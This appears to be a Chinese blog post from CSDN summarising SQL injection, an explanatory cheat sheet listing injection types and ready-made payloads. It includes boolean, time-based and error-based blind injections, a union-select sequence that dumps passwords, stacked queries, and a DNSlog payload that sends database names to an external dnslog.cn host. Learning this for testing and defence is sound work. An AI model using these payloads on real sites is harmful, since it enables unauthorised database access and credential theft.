SQL注入知识点总结-CSDN博客

本文链接：https://blog.csdn.net/m0_70210435/article/details/133764794

一、SQL注入原理：

SQL注射能使攻击者绕过认证机制，完全控制远程服务器上的数据库。SQL是结构化查询语言的简称，它是访问数据库的事实标准。目前，大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台都使用某种SQL数据库。跟大多数语言一样，SQL语法允许数据库命令和用户数据混杂在一起的。如果开发人员不细心的话，用户数据就有可能被解释成命令，这样的话，远程用户就不仅能向Web应用输入数据，而且还可以在数据库上执行任意命令了。

二、SQL注入式攻击的形式(主要有两种)：

是直接将代码插入到与SQL命令串联在一起并使得其以执行的用户输入变量。上面笔者举的例子就是采用了这种方法。由于其直接与SQL语句捆绑，故也被称为直接注入式攻击法。
是一种间接的攻击方法，它将恶意代码注入要在表中存储或者作为原书据存储的字符串。在存储的字符串中会连接到一个动态的SQL命令中，以执行一些恶意的SQL代码。注入过程的工作方式是提前终止文本字符串，然后追加一个新的命令。如以直接注入式攻击为例。就是在用户输入变量的时候，先用一个分号结束当前的语句。然后再插入一个恶意SQL语句即可。由于插入的命令可能在执行前追加其他字符串，因此攻击者常常用注释标记“–”或“#”来终止注入的字符串。执行时，系统会认为此后语句位注释，故后续的文本将被忽略，不被编译与执行。

三、漏洞分类：

1. 注入点类型分类：

· 数字型注入

当我们访问页面时经常会出现http:xxx.admin.com?id=1这种形式的url，这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常，and 1=2回显不正常的情况。如果出现了我们一般就认为这里存在注入，并且是数字型注入。如果没有出现那么并不能排查这里没有注入，只是排除这里不存在数字型的注入。

数字型注入还可以利用数字的增减操作进行布尔盲注，避免使用and，or 等敏感词。

id=3-1

id=1%2b1

· 字符型注入

http:xxx.admin.com?id=1同样的url，我们输入 ‘ 看是否会出现报错的现象。如果存在我们可以进一步的闭合我们的语句。

select * from table where id='1'

select * from table where id='1' and 1=1 # '

· 搜索型注入

SELECT*from test where names like '%要查询的关键字'
//我们写入类型这样的语句进行闭合 %’ and 1=1 #
SELECT*from test where names like '%要查询的关键字%' and 1=1 # % '

2. 按照数据提交方式分类

· get注入

这里是引用数据以get的方式进行提交。注入点一般在get提交的url后，可以通过bp抓包进行查找。

· post注入

数据以post的方式进行提交。注入点一般表单的填写处，如资料的填写等地方较为常见，可以通过bp抓包进行查找。

· http头部注入

· user-agent: 判定用户使用的操作系统，以及使用的浏览器的版本。
· cookie: 判定用户的身份，进行session跟踪可以存储在用户本地终端上的数据，简单理解为用户的一张身份辨别卡。
· x-forwarded-for: 是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。
· client-ip: 数据库保存客户端IP的参数。
· rerferer: 浏览器向web端表明自己从哪个连接而来。
· host: 客户端指定自己想访问的WEB服务器的域名/IP 地址和端口号。

3. 按照返回结果分类

· 盲注

特点：盲注在于无法构造出回显位时使用。
优点：优点是适配绝大部分注入点。
缺点：注入繁琐，费时费力，高频率对服务器发起访问也容易被ban。
分类：布尔盲注，时间盲注，dnslog盲注。

布尔盲注

特点: 以页面回显的内容的不同作为判定依据。

id=1 and 1=1

id=1 and 1=2

id=1 and user()=‘root@localhost’

id=1 and substr((select user()),1,1)= ‘r’

id=1 and ascii(substr((selectuser()),1,1))= 114

时间盲注

时间盲注，以回显的时间长短作为判断依旧。

id=1 and sleep(2)

id=1 and if((substr((select user()),1,1)='r'),sleep(2),1)

dnslog盲注

特点: 必须windows系统，必须root权限，必须secure_file_priv为空。

id=2 and 1=(selectload_file(concat('\\\\',hex(database()),'.pk4qft.dnslog.cn\\test')))

· 报错注入

特点：经过精心构造的函数，让函数处理user()等不合规定的数据，引发mysql报错。最常用的是updatexml()。
优点：报错注入优点是注入位置广泛，几乎任何和数据库有关的操作经过sql拼接都可以产生报错注>入，有回显位，获取数据方便。
缺点：缺点是必须开启错误提示，mysqli_error()。

1.floor

id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group
by x)a);

2.extractvalue()

id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

id=1 and exp(~(select * from(select user())a));

· 联合查询

特点：联合注入使用了union select联合查询，常用来拼接在where后面，并且通过报错的方式显示显位。
优势：联合注入通过显位的方式可以快速的爆出数据。
缺点：缺点是只能用在select最后处，后面如果还有sql语句就必须注释掉。并且必须用到union和select两个关键字，并且这两个关键字也很容易被拦截。

http://127.0.0.1/news.php?id=1

http://127.0.0.1/news.php?id=1 order by 4

http://127.0.0.1/news.php?id=-1 union select 1,2,3,4

http://127.0.0.1/news.php?id=-1 union select user(),2,3,4

http://127.0.0.1/news.php?id = -1 union select database(),2,3,4

http://127.0.0.1/news.php?id = -1 union select group_concat(schema_name),2,3,4  from information_schema.schemata

http://127.0.0.1/news.php?id = -1 union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()

http://127.0.0.1/news.php?id = -1 union select group_concat(column_name),2,3,4 from information_schema.columns where table_name= 'user' and table_schema=database()

http://127.0.0.1/news.php?id = -1 union select group_concat(password),2,3,4 from user

· 堆叠注入

特点:

堆叠注入在mysql数据库中并不常见，常见于mssql数据库，mssql数据库是默认堆叠注入的。
堆叠注入必须要用到mysqli_multi_query()函数，可以使用分号分隔来执行多个语句，相当于可直连数据库。
堆叠注入的危害性非常的大，通常sql注入有诸多限制，比如只能查不能增删改，不能更改数据库设置，而堆叠注入相当于获取了数据库密码进行直连，直接操作数据库。

id=1;select user();

· 宽字节注入

特点：

字符注入的时候我们需要逃逸单引号，但是php提供了魔术引号开关magic_quotes_gpc和addslashes()，iconv()函数作为防御，特点是自动给传入的参数如单引号，双引号，反斜杠，%00前面加一个反斜杠，进行转义，避免单引号进行逃逸。
如果数据库是GBK格式而非默认的UTF-8格式，则我们利用两个url编码是一个汉字的特点，组合一个汉字从而解决”\“问题，完成单引号的逃逸。